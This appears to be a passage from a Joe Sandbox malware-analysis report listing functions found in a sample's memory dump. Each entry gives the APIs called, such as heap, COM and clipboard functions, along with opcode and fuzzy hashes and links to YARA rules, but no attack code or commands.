                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: tuv
                                                                                                                                                                                                                                                  • API String ID: 0-2475268160
                                                                                                                                                                                                                                                  • Opcode ID: 692413315616f7dcebff6ff457f6b3838c60e2c9e7b6f7554dd79316d44026a4
                                                                                                                                                                                                                                                  • Instruction ID: 96cc1be5c7b42f4822ccf6fdabcc1d0a1cf8542e79077bfe6f2257edbdd6f4ef
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 692413315616f7dcebff6ff457f6b3838c60e2c9e7b6f7554dd79316d44026a4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B6133B6604700CFC7208F24D8923A3B3F2FF96318F18456EE996477A1E739A945C759
                                                                                                                                                                                                                                                  Function 0043DBD0 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                  • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                                  • Opcode ID: a54cd9664649f0a3eb3b986b2c8d66ddc9897b79c163bf161da4d5756e812fe2
                                                                                                                                                                                                                                                  • Instruction ID: 1421818bc4f15c0d032df179158ed2797c8d4970c2420d5e39c05150b2e3af5d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a54cd9664649f0a3eb3b986b2c8d66ddc9897b79c163bf161da4d5756e812fe2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C33100B15183048BC314DF18E8C162BBBF8FB9A314F15A92DE68687391D3759908CB9A
                                                                                                                                                                                                                                                  Function 00409CC0 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: \U^_
                                                                                                                                                                                                                                                  • API String ID: 0-352632802
                                                                                                                                                                                                                                                  • Opcode ID: b233260ff75ba58cbb536c0014e0eb0df055bc4e14581868770786c388d706bb
                                                                                                                                                                                                                                                  • Instruction ID: 5fa690bb4235e6f9a1b833386d74a381627e7adb8b1be8a89cbf23ee07b36487
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b233260ff75ba58cbb536c0014e0eb0df055bc4e14581868770786c388d706bb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D011E23060C3808FD324DF3495549ABBBA5EFD7748F545A2CE4C56B281C735980A8FAA
                                                                                                                                                                                                                                                  Function 0043DCF0 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                  • Opcode ID: 7e2f85c664c8434edd563ad3eec3cf26f3dbdf93c28ccb518c6c18397a03e6ac
                                                                                                                                                                                                                                                  • Instruction ID: 42590aa1c4a3029240d7faad05c1566b36b776a36cf424c854185cc8c2ee326e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e2f85c664c8434edd563ad3eec3cf26f3dbdf93c28ccb518c6c18397a03e6ac
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 58717A31A043014BC714AF29E890A3FB7A6EFDD750F1AD43EE4868B365DB349C11878A
                                                                                                                                                                                                                                                  Function 0043B720 Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 0043B720
                                                                                                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 0043B740
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ForegroundWindow
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2020703349-0
                                                                                                                                                                                                                                                  • Opcode ID: a4781643aa2d8fd57512208f1c3e62aa4b8d5176cb57333a04816d28865289df
                                                                                                                                                                                                                                                  • Instruction ID: 191facca889f69fa70601903ca8693053aaba1cbaba24685dbffd0b384c421fe
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a4781643aa2d8fd57512208f1c3e62aa4b8d5176cb57333a04816d28865289df
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7ED0A7FDD20110EBC604AB71FC4A41B3A1AEB4722DB545539EC0343352DA39782E868F
                                                                                                                                                                                                                                                  Function 0043B420 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,0040B29B,?,00000001,?,?,?,?,?,?,?), ref: 0043B452
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                  • Opcode ID: c927d8c6f07db5a3335dd59de96673b47f735cea6f05c616f97ff7e83687720b
                                                                                                                                                                                                                                                  • Instruction ID: a89ac6462aaa6a8a5f29c09ee71e481237a955995f4f3f89a98fbf9f2f2a6ed3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c927d8c6f07db5a3335dd59de96673b47f735cea6f05c616f97ff7e83687720b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FBE0E536904210EBD2002B357C06B177678EF9B715F060436F40152115D739E801C5DE
                                                                                                                                                                                                                                                  Function 00430879 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: BlanketProxy
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3890896728-0
                                                                                                                                                                                                                                                  • Opcode ID: 83941c5ff406fddefe2a55fc962621e55030b9d07cbba56e81ba996dd76ec11c
                                                                                                                                                                                                                                                  • Instruction ID: 1146a04256a80fd680d05c5d227ab35205256b262c73fed29a8c8dc337ffb545
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 83941c5ff406fddefe2a55fc962621e55030b9d07cbba56e81ba996dd76ec11c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E00114B5249702CFE310CF64D5D8B4BBBF1AB84304F14892CE8A54B385C7B9A9498FC2
                                                                                                                                                                                                                                                  Function 0042E343 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: BlanketProxy
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3890896728-0
                                                                                                                                                                                                                                                  • Opcode ID: f641e3c77b6ce86b3dd807bf46eed919c30205036380bbbe1e710ba534cd93a1
                                                                                                                                                                                                                                                  • Instruction ID: cdfd11b330a352dee93e16416f8877f043d61a2de36bf40ddff772d5b84e5129
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f641e3c77b6ce86b3dd807bf46eed919c30205036380bbbe1e710ba534cd93a1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C601F9B86097058FE305DF28D498B5ABBF1FB89304F10881CE4958B3A1C779A949CF81
                                                                                                                                                                                                                                                  Function 0040CDF0 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CE03
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Initialize
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2538663250-0
                                                                                                                                                                                                                                                  • Opcode ID: 61d928746ba4ae58ea54a0875f1c3d0382ed5290a25c5d8e3ced17899992ccae
                                                                                                                                                                                                                                                  • Instruction ID: f1973b7854016afe0481596635c710bb103935c4c1c993b3491e04eff0e8badb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 61d928746ba4ae58ea54a0875f1c3d0382ed5290a25c5d8e3ced17899992ccae
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 01D0A7345545486BD250A75CDD0BF563A5C9703B29F400239B763D61D1D9506920C669
                                                                                                                                                                                                                                                  Function 0040CE23 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CE35
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InitializeSecurity
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 640775948-0
                                                                                                                                                                                                                                                  • Opcode ID: 9269880a45a3c80f6ec8299234c73a1314589920fa48725fb3d67ea21efaca66
                                                                                                                                                                                                                                                  • Instruction ID: 9bb2948b1e33ad1240181575e0f5375bfb099cf60bc3df2fdc322b3d55e14239
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9269880a45a3c80f6ec8299234c73a1314589920fa48725fb3d67ea21efaca66
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CAD0C9343D83007AF5748B48ED53F1432169702F11FB00629F322FE6D4C9E07121861D
                                                                                                                                                                                                                                                  Function 00439B60 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(?,00000000,00000000,00412F5C), ref: 00439B80
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3298025750-0
                                                                                                                                                                                                                                                  • Opcode ID: d0720c9dfbe2666778a34d5469e5ae55c8d5964329e0fb1cba2b62a2f878fbc3
                                                                                                                                                                                                                                                  • Instruction ID: 8d81dc3d2e1c71e2762f942217139477682170591cb2c618f1865e02491f5b7e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0720c9dfbe2666778a34d5469e5ae55c8d5964329e0fb1cba2b62a2f878fbc3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76D0C935505126EBCA506B28BC15BC73A989F4A671F0708A1B4006A075C765EC919AD8
                                                                                                                                                                                                                                                  Function 00439B40 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00439B50
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                  • Opcode ID: a95155655fbe3eb8f0e77a05497d8175f8be12db265ae77d37b3e7249a9ffdc4
                                                                                                                                                                                                                                                  • Instruction ID: 3d340f236624c1ae318c051adf9ea47d82c8c11c3707c94fc3fa8f772c7fe72e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a95155655fbe3eb8f0e77a05497d8175f8be12db265ae77d37b3e7249a9ffdc4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91C04831145224ABDA10AB15EC09B8A3AA8AF496A1F1A04A6B005660B28760AC929A98

                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                  Function 00419C10 Relevance: 15.3, APIs: 2, Strings: 6, Instructions: 1297COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0043B480: LdrInitializeThunk.NTDLL(0043D4FB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043B4AE
                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 0041A21A
                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 0041A29B
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FreeLibrary$InitializeThunk
                                                                                                                                                                                                                                                  • String ID: I,~M$PQ$cba`$cba`$cba`$wEtG
                                                                                                                                                                                                                                                  • API String ID: 764372645-3803835663
                                                                                                                                                                                                                                                  • Opcode ID: 47063c938c01330124c9dc59b6d375a3b8a360990f39732c0e3748d67b9dcd4f
                                                                                                                                                                                                                                                  • Instruction ID: ce701afe96e54189f6fff091c8333c98f5ae15aa60c98f01a083bef101dadeb2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47063c938c01330124c9dc59b6d375a3b8a360990f39732c0e3748d67b9dcd4f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C59235746093409FE714CF65D891B6BBBE2EBD5300F28882EE58487391D7799C81CB9B
                                                                                                                                                                                                                                                  Function 00425920 Relevance: 12.9, Strings: 10, Instructions: 398COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: z%|$"r,t$&f?x$3v#H$<b"d$=j9l$cba`$cba`$Z\$^P
                                                                                                                                                                                                                                                  • API String ID: 0-3047316687
                                                                                                                                                                                                                                                  • Opcode ID: 45c83a3ddc5386c7eaecb6d0721308efe7616dc8ac7a87c6f5778f813dbd46f5
                                                                                                                                                                                                                                                  • Instruction ID: 146473404e5499b4986dffa8d26f26e1c07bf5215faae6f3d7194190b628d0b4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 45c83a3ddc5386c7eaecb6d0721308efe7616dc8ac7a87c6f5778f813dbd46f5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2D124B9608380DFE324DF15E88176BB7E1FBD5304F94982DE58587261D738D901CB4A
                                                                                                                                                                                                                                                  Function 00431A30 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109clipboardCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                                  • String ID: K
                                                                                                                                                                                                                                                  • API String ID: 2832541153-856455061
                                                                                                                                                                                                                                                  • Opcode ID: 027abc228ed841da0674a97a3735ab7f080d79d715808bd082ae78d0cbe3e8e1
                                                                                                                                                                                                                                                  • Instruction ID: 513562b2ac7e6d1d4712994eff6d7c1bc04b9d90a7c3137532ed1f51a9abc6ba
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 027abc228ed841da0674a97a3735ab7f080d79d715808bd082ae78d0cbe3e8e1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34418E6150C7818ED310AF7C988826FBFE09B96224F044A6EE8E5872D2E6389549C797
                                                                                                                                                                                                                                                  Function 004296D8 Relevance: 9.1, Strings: 7, Instructions: 340COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
